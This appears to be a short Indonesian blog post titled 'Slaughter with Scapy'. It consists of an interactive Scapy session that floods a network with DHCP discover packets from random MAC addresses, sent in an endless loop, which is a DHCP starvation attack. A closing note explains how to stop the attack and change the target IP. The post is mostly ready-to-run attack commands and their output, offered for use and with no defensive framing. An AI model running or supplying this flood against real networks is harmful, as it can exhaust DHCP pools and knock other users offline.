Thursday, May 8, 2014

Pembantaian dengan Scapy

root@hclinux:/home/mulyana# scapy
INFO: Can't import python gnuplot wrapper . Won't be able to plot.
INFO: Can't import PyX. Won't be able to use psdump() or pdfdump().
WARNING: No route found for IPv6 destination :: (no default route?)
INFO: Can't import python Crypto lib. Won't be able to decrypt WEP.
INFO: Can't import python Crypto lib. Disabled certificate manipulation tools
Welcome to Scapy (2.2.0)
>>> conf.checkIPaddr = False
>>> dhcp_discover = Ether(src=RandMAC(),dst="ff:ff:ff:ff:ff:ff")/IP(src="192.168.1.103",dst="255.255.255.255")/UDP(sport=80,dport=80)/BOOTP(chaddr=RandString(12,'0123456789abcdef'))/DHCP(options=[("message-type","discover"),"end"])
>>> sendp(dhcp_discover, loop=1)
.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Sent 503 packets.
>>> 

Note : Hentikan serangan tekan CTRL+C , Keluar tekan CTRL + D, Ganti IP Target (src="192.168.1.103")

0 comments:

Post a Comment